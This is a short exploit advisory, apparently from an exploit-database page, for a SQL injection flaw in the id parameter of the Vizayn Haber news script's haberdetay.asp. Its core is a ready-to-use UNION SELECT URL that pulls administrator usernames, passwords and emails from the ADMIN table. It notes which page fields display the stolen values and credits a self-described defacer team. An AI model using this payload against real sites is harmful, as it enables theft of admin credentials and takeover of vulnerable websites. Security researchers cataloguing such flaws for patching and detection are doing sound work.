Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability

2007-01-01 00:00:00

###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: [email protected]
###############################################################
#Risk : High
#Download Link Of Vizayn Haber : http://aspindir.com/goster/4623


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi : USERNAME
#Haber Basligi : PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

#

Fixes

No fixes

In order to submit a new fix you need to be registered.